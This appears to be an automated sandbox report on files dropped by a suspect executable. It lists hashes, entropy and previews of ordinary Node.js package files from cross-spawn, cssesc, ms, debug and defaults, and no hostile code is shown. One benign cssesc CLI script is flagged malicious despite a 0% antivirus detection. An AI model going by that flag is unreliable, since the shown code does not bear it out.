              SHA-512:F9F0C2A257327F04AB1D06839068866755653566E401E2334BCFC03B02FDD8BA502A9A54556C835E31DA81F22D16091A0A0D46EB4E550B29E1B51CC1F4E8DF20
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "cross-spawn",. "version": "7.0.3",. "description": "Cross platform child_process#spawn and child_process#spawnSync",. "keywords": [. "spawn",. "spawnSync",. "windows",. "cross-platform",. "path-ext",. "shebang",. "cmd",. "execute". ],. "author": "Andr. Cruz <andre@moxy.studio>",. "homepage": "https://github.com/moxystudio/node-cross-spawn",. "repository": {. "type": "git",. "url": "git@github.com:moxystudio/node-cross-spawn.git". },. "license": "MIT",. "main": "index.js",. "files": [. "lib". ],. "scripts": {. "lint": "eslint .",. "test": "jest --env node --coverage",. "prerelease": "npm t && npm run lint",. "release": "standard-version",. "postrelease": "git push --follow-tags origin HEAD && npm publish". },. "husky": {. "hooks": {. "commit-msg": "commitlint -E HUSKY_GIT_PARAMS",. "pre-commit": "lint-staged". }. },. "lint-staged": {. "*.js": [. "eslint --fix",. "git add". ].
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:a /usr/bin/env node script, Unicode text, UTF-8 text executable
              Category:dropped
              Size (bytes):3103
              Entropy (8bit):5.167953250103123
              Encrypted:false
              SSDEEP:
              MD5:28BB635BFAD96706B78123E7207BDCE8
              SHA1:7165F2130109FC8C492F0C8C295768A6E6435902
              SHA-256:D46F3B9E3DE9D4A40489FE2FB144429DE2AA53EA5D7E4C856B1FA3CCAECC6E44
              SHA-512:8E77D7099398E497EBAAEF6D727C24DEC56FB87F668E58F2B5C0380136EA92F48C6423C72A6DDABE808188C15BDB816B029DF0BE5D0A8C3B3B7D10398C89BE48
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:#!/usr/bin/env node.const fs = require('fs');.const cssesc = require('../cssesc.js');.const strings = process.argv.splice(2);.const stdin = process.stdin;.const options = {};.const log = console.log;..const main = function() {..const option = strings[0];...if (/^(?:-h|--help|undefined)$/.test(option)) {...log(....'cssesc v%s - https://mths.be/cssesc',....cssesc.version...);...log([....'\nUsage:\n',....'\tcssesc [string]',....'\tcssesc [-i | --identifier] [string]',....'\tcssesc [-s | --single-quotes] [string]',....'\tcssesc [-d | --double-quotes] [string]',....'\tcssesc [-w | --wrap] [string]',....'\tcssesc [-e | --escape-everything] [string]',....'\tcssesc [-v | --version]',....'\tcssesc [-h | --help]',....'\nExamples:\n',....'\tcssesc \'f\xF6o \u2665 b\xE5r \uD834\uDF06 baz\'',....'\tcssesc --identifier \'f\xF6o \u2665 b\xE5r \uD834\uDF06 baz\'',....'\tcssesc --escape-everything \'f\xF6o \u2665 b\xE5r \uD834\uDF06 baz\'',....'\tcssesc --double-quotes --wrap \'f\xF6o \u2665 b\xE5r \uD
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):3514
              Entropy (8bit):5.217473156465288
              Encrypted:false
              SSDEEP:
              MD5:D4CA8943F44A56283B3E0ECFFEB1FE6E
              SHA1:42286BB95DF779C97CF53A9E8F664F4897C0FE96
              SHA-256:E80B6F193BE7DAFDDC6D4C8EB4E0B0C1E3CFABE8D9E65F1AE309D45BEBD63A91
              SHA-512:799B7BC7B61297EB3FC3FDD7B5E080381CE1CAFF873084CF4AF96E67678926E512E4118F3F2EF7EC60F22828DFFB6F26EBE208EB3FB0BD9D5120922F86A55C7B
              Malicious:false
              Reputation:unknown
              Preview:/*! https://mths.be/cssesc v3.0.0 by @mathias */.'use strict';..var object = {};.var hasOwnProperty = object.hasOwnProperty;.var merge = function merge(options, defaults) {..if (!options) {...return defaults;..}..var result = {};..for (var key in defaults) {...// `if (defaults.hasOwnProperty(key) { . }` is not needed here, since...// only recognized option names are used....result[key] = hasOwnProperty.call(options, key) ? options[key] : defaults[key];..}..return result;.};..var regexAnySingleEscape = /[ -,\.\/:-@\[-\^`\{-~]/;.var regexSingleEscape = /[ -,\.\/:-@\[\]\^`\{-~]/;.var regexAlwaysEscape = /['"\\]/;.var regexExcessiveSpaces = /(^|\\+)?(\\[A-F0-9]{1,6})\x20(?![a-fA-F0-9\x20])/g;..// https://mathiasbynens.be/notes/css-escapes#css.var cssesc = function cssesc(string, options) {..options = merge(options, cssesc.options);..if (options.quotes != 'single' && options.quotes != 'double') {...options.quotes = 'single';..}..var quote = options.quotes == 'double' ? '"' : '\'';..var is
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:troff or preprocessor input, ASCII text
              Category:dropped
              Size (bytes):1957
              Entropy (8bit):4.912080380734542
              Encrypted:false
              SSDEEP:
              MD5:444E7EBCBDFFC56223B77DB8BC6678EA
              SHA1:941D4962FEAEC32CD2258E71E19E4465FFBFF2C8
              SHA-256:25B681D56BAD04EB2EB14CFAEF901A11DA41D9AD364705BE1FA47B1F9E0E8729
              SHA-512:D53E46EAB37A780AAD426B598E83330B47FEEB650F453BC4F12BC40FD3E7A9DCDCB5B7288102DDD15FD822311EA4609710B56E3797D8045BC2418968437582E4
              Malicious:false
              Reputation:unknown
              Preview:.Dd August 9, 2013..Dt cssesc 1..Sh NAME..Nm cssesc..Nd escape text for use in CSS string literals or identifiers..Sh SYNOPSIS..Nm..Op Fl i | -identifier Ar string..br..Op Fl s | -single-quotes Ar string..br..Op Fl d | -double-quotes Ar string..br..Op Fl w | -wrap Ar string..br..Op Fl e | -escape-everything Ar string..br..Op Fl v | -version..br..Op Fl h | -help..Sh DESCRIPTION..Nm.escapes strings for use in CSS string literals or identifiers while generating the shortest possible valid ASCII-only output...Sh OPTIONS..Bl -ohang -offset..It Sy "-s, --single-quotes".Escape any occurences of ' in the input string as \\', so that the output can be used in a CSS string literal wrapped in single quotes...It Sy "-d, --double-quotes".Escape any occurences of " in the input string as \\", so that the output can be used in a CSS string literal wrapped in double quotes...It Sy "-w, --wrap".Make sure the output is a valid CSS string literal wrapped in quotes. The type of quotes can be specified usi
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1252
              Entropy (8bit):4.700050963010195
              Encrypted:false
              SSDEEP:
              MD5:ACB5BB4E8F8EE15167E66A40B3E2159F
              SHA1:3A37CECE4F715E91EF0AED027BAEA0039BB20087
              SHA-256:23F134BE44F2877C298CA56C5464EBBE190DDB49C3CE9B82BE3C73A64512D014
              SHA-512:8EBE4881CCB3B63142A217B2338AD17347E265FA54EFFA4B6BFB4845148CD26348BE3232693225B61CDD39AF4235C5C016EA17D62D731CCCED3BBAFD9548354F
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "cssesc",. "version": "3.0.0",. "description": "A JavaScript library for escaping CSS strings and identifiers while generating the shortest possible ASCII-only output.",. "homepage": "https://mths.be/cssesc",. "engines": {. "node": ">=4". },. "main": "cssesc.js",. "bin": "bin/cssesc",. "man": "man/cssesc.1",. "keywords": [. "css",. "escape",. "identifier",. "string",. "tool". ],. "license": "MIT",. "author": {. "name": "Mathias Bynens",. "url": "https://mathiasbynens.be/". },. "repository": {. "type": "git",. "url": "https://github.com/mathiasbynens/cssesc.git". },. "bugs": "https://github.com/mathiasbynens/cssesc/issues",. "files": [. "LICENSE-MIT.txt",. "cssesc.js",. "bin/",. "man/". ],. "scripts": {. "build": "grunt template && babel cssesc.js -o cssesc.js",. "test": "mocha tests",. "cover": "istanbul cover --report html node_modules/.bin/_mocha tests -- -u exports -R spec". },. "devDependencies": {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1139
              Entropy (8bit):5.200283662785546
              Encrypted:false
              SSDEEP:
              MD5:D85A365580888E9EE0A01FB53E8E9BF0
              SHA1:59E43165AEEFDFE28D5E497A0AAEF79D6D622AF0
              SHA-256:3A61C6C96CAF5C1D9B623FB9B04C822B783DFCB78AA7E49C76A3F643E6ED7F95
              SHA-512:3489EC3783403DAA899EC5BD89D8D23A7386AB2CEA6243CCCCB23D2CD7A69C735F2852D66A6C3571D22A7BF724823173C8C115C4E49B9120331638145E3DC058
              Malicious:false
              Reputation:unknown
              Preview:(The MIT License)..Copyright (c) 2014-2017 TJ Holowaychuk <tj@vision-media.ca>.Copyright (c) 2018-2021 Josh Junon..Permission is hereby granted, free of charge, to any person obtaining a copy of this software.and associated documentation files (the 'Software'), to deal in the Software without restriction,.including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,.subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or substantial.portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT.LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,.WHETHER IN AN ACT
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3023
              Entropy (8bit):4.755253471176512
              Encrypted:false
              SSDEEP:
              MD5:FDDCC2097091479666D0865C176D6615
              SHA1:55F9B3A7D4CFBF68B19CCD0D698AA86483DD4694
              SHA-256:55986972F5F3C9446F876C576E1CD30FD4F04CD26527EFBB5AD834637C740E4C
              SHA-512:252644169A9398527927B69A2F19C6578BD62DCD180B94984D991939F53BF4E77CA687E840DB42F7DBA3B37124A5E3F3EDA83535E75491BBE6CA440A7149913F
              Malicious:false
              Reputation:unknown
              Preview:/**. * Helpers.. */..var s = 1000;.var m = s * 60;.var h = m * 60;.var d = h * 24;.var w = d * 7;.var y = d * 365.25;../**. * Parse or format the given `val`.. *. * Options:. *. * - `long` verbose formatting [false]. *. * @param {String|Number} val. * @param {Object} [options]. * @throws {Error} throw an error if val is not a non-empty string or a number. * @return {String|Number}. * @api public. */..module.exports = function(val, options) {. options = options || {};. var type = typeof val;. if (type === 'string' && val.length > 0) {. return parse(val);. } else if (type === 'number' && isFinite(val)) {. return options.long ? fmtLong(val) : fmtShort(val);. }. throw new Error(. 'val is not a non-empty string or a valid number. val=' +. JSON.stringify(val). );.};../**. * Parse the given `str` and return milliseconds.. *. * @param {String} str. * @return {Number}. * @api private. */..function parse(str) {. str = String(str);. if (str.length > 100) {. return;. }.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1077
              Entropy (8bit):5.1041829250749355
              Encrypted:false
              SSDEEP:
              MD5:FD56FD5F1860961DFA92D313167C37A6
              SHA1:884E84EBFDDAFD93B5BB814DF076D2EBD1757BA8
              SHA-256:6652830C2607C722B66F1B57DE15877AB8FC5DCA406CC5B335AFEB365D0F32C1
              SHA-512:2BEC1EFB4DC59FA436C38A1B45B3DBD54A368460BCBBB3D9791B65275B5DC3C71A4C54BE458F4C74761DCCB8897EFAAB46DF5A407723DA5C48F3DB02D555D5B9
              Malicious:false
              Reputation:unknown
              Preview:The MIT License (MIT)..Copyright (c) 2016 Zeit, Inc...Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR I
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):705
              Entropy (8bit):4.424886427879785
              Encrypted:false
              SSDEEP:
              MD5:B3EA7267A23F72028E774742792B114A
              SHA1:FE112804E727B4F3489E9A52900349D0A4ED302C
              SHA-256:3708FD273BF5B1E91C72D88143F48AD962ADCC10B99250A4A203D13804F37757
              SHA-512:01975D65BC491D0B39435D793A62BCDBA6B5EDF4FB886DE0E48A8A393E26FDF31BDFB4F91DD7E10BA69A1E62ED091D5EA04F9F8BF57D784C3491A5C5C8472988
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "ms",. "version": "2.1.2",. "description": "Tiny millisecond conversion utility",. "repository": "zeit/ms",. "main": "./index",. "files": [. "index.js". ],. "scripts": {. "precommit": "lint-staged",. "lint": "eslint lib/* bin/*",. "test": "mocha tests.js". },. "eslintConfig": {. "extends": "eslint:recommended",. "env": {. "node": true,. "es6": true. }. },. "lint-staged": {. "*.js": [. "npm run lint",. "prettier --single-quote --write",. "git add". ]. },. "license": "MIT",. "devDependencies": {. "eslint": "4.12.1",. "expect.js": "0.3.1",. "husky": "0.14.3",. "lint-staged": "5.0.0",. "mocha": "4.0.1". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1419
              Entropy (8bit):4.8324897923022
              Encrypted:false
              SSDEEP:
              MD5:2630A1AC039C8970C8FB0DAF0F2F03C4
              SHA1:ED6FE3DCF77A4C2DDADDE904C5B1FC47CF9893C7
              SHA-256:754BA4F352A9B983FBBF93CFFFE015D29BC789A08EB05815270ABF50902697FB
              SHA-512:A017D21A1ECB159065BC32B94B38DE03B38C10448B85F88BFE1498B144320884D612A868B9DB192D6ACF041F88DA415F953D9DD8541EE29E4053E2463DD54791
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "debug",. "version": "4.3.4",. "repository": {. "type": "git",. "url": "git://github.com/debug-js/debug.git". },. "description": "Lightweight debugging utility for Node.js and the browser",. "keywords": [. "debug",. "log",. "debugger". ],. "files": [. "src",. "LICENSE",. "README.md". ],. "author": "Josh Junon <josh.junon@protonmail.com>",. "contributors": [. "TJ Holowaychuk <tj@vision-media.ca>",. "Nathan Rajlich <nathan@tootallnate.net> (http://n8.io)",. "Andrew Rhyne <rhyneandrew@gmail.com>". ],. "license": "MIT",. "scripts": {. "lint": "xo",. "test": "npm run test:node && npm run test:browser && npm run lint",. "test:node": "istanbul cover _mocha -- test.js",. "test:browser": "karma start --single-run",. "test:coverage": "cat ./coverage/lcov.info | coveralls". },. "dependencies": {. "ms": "2.1.2". },. "devDependencies": {. "brfs": "^2.0.1",. "browserify": "^16.2.3",. "coveralls": "^3.0.2",. "
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):6010
              Entropy (8bit):5.363174189797936
              Encrypted:false
              SSDEEP:
              MD5:20BD9FAD97B79A0A28E550ADE5CD3AB3
              SHA1:E63A38B9E85D1D86DEA2E02C6F885FA001B49D34
              SHA-256:4E3DC6D0E1DB58A0D74206B443F35582D3B717BE56A0F6D030C34AF6C2AD9F62
              SHA-512:6905ED5F21C03ABB872232B8356CD40EF3A8D095E2B944049563F87B006A4D480D7B4F5B58005F5D5265AB8A08FF0E3861FE342DA060E5B73E45472391D3D47B
              Malicious:false
              Reputation:unknown
              Preview:/* eslint-env browser */../**. * This is the web browser implementation of `debug()`.. */..exports.formatArgs = formatArgs;.exports.save = save;.exports.load = load;.exports.useColors = useColors;.exports.storage = localstorage();.exports.destroy = (() => {..let warned = false;...return () => {...if (!warned) {....warned = true;....console.warn('Instance method `debug.destroy()` is deprecated and no longer does anything. It will be removed in the next major version of `debug`.');...}..};.})();../**. * Colors.. */..exports.colors = [..'#0000CC',..'#0000FF',..'#0033CC',..'#0033FF',..'#0066CC',..'#0066FF',..'#0099CC',..'#0099FF',..'#00CC00',..'#00CC33',..'#00CC66',..'#00CC99',..'#00CCCC',..'#00CCFF',..'#3300CC',..'#3300FF',..'#3333CC',..'#3333FF',..'#3366CC',..'#3366FF',..'#3399CC',..'#3399FF',..'#33CC00',..'#33CC33',..'#33CC66',..'#33CC99',..'#33CCCC',..'#33CCFF',..'#6600CC',..'#6600FF',..'#6633CC',..'#6633FF',..'#66CC00',..'#66CC33',..'#9900CC',..'#9900FF',..'#9933CC',..'#9933FF',..'#99
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):6289
              Entropy (8bit):5.026038332983778
              Encrypted:false
              SSDEEP:
              MD5:28E94A3CC7D081498BEA5CED383038F6
              SHA1:C9707394C09387B56864A8865158D29FD307774A
              SHA-256:C65BFF44C189188E0C45AFDBD9B02C427FF5C6E54B94DA53C102FBB7A53F0E37
              SHA-512:5775D4C9B823DC9514488A28F2BFCBA990A13DEFDFC5992E1FFEC915CA5E6EC2BA87BDDB1CB7F4B772345A14B4041F98A74F7BCC9D9BE2A3371E3002C33BBEBC
              Malicious:false
              Reputation:unknown
              Preview:./**. * This is the common logic for both the Node.js and web browser. * implementations of `debug()`.. */..function setup(env) {..createDebug.debug = createDebug;..createDebug.default = createDebug;..createDebug.coerce = coerce;..createDebug.disable = disable;..createDebug.enable = enable;..createDebug.enabled = enabled;..createDebug.humanize = require('ms');..createDebug.destroy = destroy;...Object.keys(env).forEach(key => {...createDebug[key] = env[key];..});.../**..* The currently active debug mode names, and names to skip...*/...createDebug.names = [];..createDebug.skips = [];.../**..* Map of special "%n" handling functions, for the debug "format" argument...*..* Valid key names are a single, lower or upper-case letter, i.e. "n" and "N"...*/..createDebug.formatters = {};.../**..* Selects a color for a debug namespace..* @param {String} namespace The namespace string for the debug instance to be colored..* @return {Number|String} An ANSI color code for the given namespace..* @api p
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):314
              Entropy (8bit):4.663591845217907
              Encrypted:false
              SSDEEP:
              MD5:D6C53F5A0DD8F256D91210AD530A2F3E
              SHA1:0F4CE3B10EFF761F099AC75593F7E05B149AE695
              SHA-256:AA127FF1752B7D9C7415C5C7BB6994D9AA722B81BCBCAB4BD48316B013D23BF3
              SHA-512:4FAA874D9D862FFC921528742C4F1FE8A9B22A358760F6E93FCEF138523575329A801CE9659ED8E96B02B73E581B3E99D91973E22981B358FFB5E43103A536C2
              Malicious:false
              Reputation:unknown
              Preview:/**. * Detect Electron renderer / nwjs process, which is node, but we should. * treat as a browser.. */..if (typeof process === 'undefined' || process.type === 'renderer' || process.browser === true || process.__nwjs) {..module.exports = require('./browser.js');.} else {..module.exports = require('./node.js');.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4685
              Entropy (8bit):5.26086678826462
              Encrypted:false
              SSDEEP:
              MD5:6E63FDA079262F01E14F03BDF77146C0
              SHA1:481608E3C95722F3A474336E5B777A6A521E76F9
              SHA-256:F237ADCB52849DE7C128F57E0468B52353C529A6C8341810477C0E7144359559
              SHA-512:3017B4717118F56FAC106DCAA046AECF3CC63C37E64F49838E5379A13583C293F39EC5ACE48FB2DABEAC6AF4A967F96219812733EAD6F36C3F5C8D132D795900
              Malicious:false
              Reputation:unknown
              Preview:/**. * Module dependencies.. */..const tty = require('tty');.const util = require('util');../**. * This is the Node.js implementation of `debug()`.. */..exports.init = init;.exports.log = log;.exports.formatArgs = formatArgs;.exports.save = save;.exports.load = load;.exports.useColors = useColors;.exports.destroy = util.deprecate(..() => {},..'Instance method `debug.destroy()` is deprecated and no longer does anything. It will be removed in the next major version of `debug`.'.);../**. * Colors.. */..exports.colors = [6, 2, 3, 4, 5, 1];..try {..// Optional dependency (as in, doesn't need to be installed, NOT like optionalDependencies in package.json)..// eslint-disable-next-line import/no-extraneous-dependencies..const supportsColor = require('supports-color');...if (supportsColor && (supportsColor.stderr || supportsColor).level >= 2) {...exports.colors = [....20,....21,....26,....27,....32,....33,....38,....39,....40,....41,....42,....43,....44,....45,....56,....57,....62,....63,....68
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1112
              Entropy (8bit):5.121370866414408
              Encrypted:false
              SSDEEP:
              MD5:CC8A04099381C61D3432E8226406CBDB
              SHA1:F6EB8CD4B473C79E30106A7CA26C085DDCD8F266
              SHA-256:FE99D9A94EC7EDC64A9767701F830F66E08239B000D653A359D66E640289ED0C
              SHA-512:D83DF84AFDCD57178B3B03FAE751B48B0EE2213F5E1482DD578E4F4DB58E585DA45FB6E7F07D18BF144F378DA8969C04A97EA58947ED7BAD0029C91F255F7555
              Malicious:false
              Reputation:unknown
              Preview:The MIT License (MIT)..Copyright (c) 2022 Sindre Sorhus.Copyright (c) 2015 Elijah Insua..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR O
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):277
              Entropy (8bit):4.662963143282629
              Encrypted:false
              SSDEEP:
              MD5:63EEC2D2CB4BDA3FBC8160A1923B7B6E
              SHA1:E40DB818E440A87121BE59FC3169018315E2DB23
              SHA-256:956873DA5A50B3C36F7497B3FDD89146E21527C8259DD6DE69F2657677B29E67
              SHA-512:8B23E82E519E38B2C169BE33A2AF15CB86752F1CB66DF33757D70F30529352AA06CC5F95BB73EC3922ADDB69A89565165EC8CCFE115D2A1D71F9F786B750BDB7
              Malicious:false
              Reputation:unknown
              Preview:var clone = require('clone');..module.exports = function(options, defaults) {. options = options || {};.. Object.keys(defaults).forEach(function(key) {. if (typeof options[key] === 'undefined') {. options[key] = clone(defaults[key]);. }. });.. return options;.};
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):632
              Entropy (8bit):4.8435759403667
              Encrypted:false
              SSDEEP:
              MD5:7DAD5E38AD85C5233313740ED68D690E
              SHA1:06F88E0899441D1848B0230F9DAF9B4C873AF31A
              SHA-256:182A686C374D9E559A621BD72A0C0ECAAA6A6AB51BFDD6697A78BAF158E66B9A
              SHA-512:111DF27E7A8CD1C2D24F9D2987E77FF8BCCC94C9D128D8D93D87BB6D5A36F70922EA8F4692A501023BE85279E00D80B6828AE08D657E13BD85406B0B3CA8C1DC
              Malicious:false
              Reputation:unknown
              Preview:{.."name": "defaults",.."version": "1.0.4",.."description": "merge single level defaults over a config object",.."main": "index.js",.."funding": "https://github.com/sponsors/sindresorhus",.."scripts": {..."test": "node test.js"..},.."repository": {..."type": "git",..."url": "git://github.com/sindresorhus/node-defaults.git"..},.."keywords": [..."config",..."defaults",..."options",..."object",..."merge",..."assign",..."properties",..."deep"..],.."author": "Elijah Insua <tmpvar@gmail.com>",.."license": "MIT",.."readmeFilename": "README.md",.."dependencies": {..."clone": "^1.0.2"..},.."devDependencies": {..."tap": "^2.0.0"..}.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1050
              Entropy (8bit):4.677093177369486
              Encrypted:false
              SSDEEP:
              MD5:051AC0B7B966044348013A7D29802E1E
              SHA1:41537038884B550553E36F41145ABB61B9193EFC
              SHA-256:8566C3A4E3D8D35308E37EEA9A65E168CF471E8CC30030C43FA277C855B54B8E
              SHA-512:EF4B3A15BC013CF6A00A2AD4721E0BCDC667CDAEA80451F352164EF5B767F69C385F2E619CFC41186E83695EC8E07D145A8AC966631D9B6BC48D5B50ECCA8A32
              Malicious:false
              Reputation:unknown
              Preview:var defaults = require('./'),. test = require('tap').test;..test("ensure options is an object", function(t) {. var options = defaults(false, { a : true });. t.ok(options.a);. t.end().});..test("ensure defaults override keys", function(t) {. var result = defaults({}, { a: false, b: true });. t.ok(result.b, 'b merges over undefined');. t.equal(result.a, false, 'a merges over undefined');. t.end();.});..test("ensure defined keys are not overwritten", function(t) {. var result = defaults({ b: false }, { a: false, b: true });. t.equal(result.b, false, 'b not merged');. t.equal(result.a, false, 'a merges over undefined');. t.end();.});..test("ensure defaults clone nested objects", function(t) {. var d = { a: [1,2,3], b: { hello : 'world' } };. var result = defaults({}, d);. t.equal(result.a.length, 3, 'objects should be clones');. t.ok(result.a !== d.a, 'objects should be clones');.. t.equal(Object.keys(result.b).length, 1, 'objects should be clones');. t.ok(result.b !==
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):336
              Entropy (8bit):4.541078001985198
              Encrypted:false
              SSDEEP:
              MD5:B79077AB75E12C8E652B4DFF7EBB453C
              SHA1:37E8641729544115B9D3A566EAD3480E47D44A9B
              SHA-256:F4686952CCCF52B0CFDEE52D5F2960DC5E8097A608987B22339ACA0F18A82B89
              SHA-512:9DDC203A53D7AC88F9AA3A7B37D22F3EB5484309C3072820B50BA796838F5F16806EC8A9D06364F5A8CC81F2D6EEE525CBC61CB2F25B3C6143CFF92779833466
              Malicious:false
              Reputation:unknown
              Preview:.1.0.0 / 2015-12-14.==================.. * Merge pull request #12 from kasicka/master. * Add license text..0.1.0 / 2014-10-17.==================.. * adds `.fluent()` to api..0.0.3 / 2014-01-13.==================.. * fix receiver for .method()..0.0.2 / 2014-01-13.==================.. * Object.defineProperty() sucks. * Initial commit.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1079
              Entropy (8bit):5.145957657453797
              Encrypted:false
              SSDEEP:
              MD5:039225978C07BC42E8C0EF2F72B81C09
              SHA1:9D414BD96CE8326FADC2F959781154DE49AF5B00
              SHA-256:CB4E4296DFC59387F7C6EF71B670CDE7050617313FCEA7173995176FEC0FCEF2
              SHA-512:D097AE93B369E4BB5BF23154EFE6DBB49B1A7F56F5BB1A03835E69461DF49D29C43D31C65F0180D0D9CCB02D382B8FE40331BDF96D010DEC4907A7B7D9DFD27F
              Malicious:false
              Reputation:unknown
              Preview:Copyright (c) 2015 TJ Holowaychuk <tj@vision-media.ca>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):100
              Entropy (8bit):4.698110006341397
              Encrypted:false
              SSDEEP:
              MD5:A15D6DBB1BE30B92AEE23E79571E93B0
              SHA1:ABD4A7CD4A519DF349900DD853A307F58A5CD4A5
              SHA-256:6438415EBEA1A06C38FB94429C95BE38996B1E774F6515D9A48E5D48DF20E9C9
              SHA-512:6E828D44C2E9DCDA74656785BF7D05DDC4A37B972E7195E287AE3B0A04BDB4D45928240E8DD7F7D3984AFA032BA501D101B33BA36CCF60E1D65E1152366C6ECA
              Malicious:false
              Reputation:unknown
              Preview:.test:..@./node_modules/.bin/mocha \...--require should \...--reporter spec \...--bail...PHONY: test
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2065
              Entropy (8bit):4.654164130694464
              Encrypted:false
              SSDEEP:
              MD5:FE8852BBEF1A3D30B7B0FC78AA3FDE97
              SHA1:694697BE68FB102FB7E9F70D9F35A8827C6D6943
              SHA-256:DB3EE6AB2FDABDFFC19D5DF0CF9461488329379CBB0640EB73203A35197960AA
              SHA-512:738B9C16DFBB96CCC3000413EB6A0FB0897633E5ADE8468FF89156571C685F4F4B2E88CD6E6D294D239D9E600C3EF92B192E7C52071630FC47440E96E27342E7
              Malicious:false
              Reputation:unknown
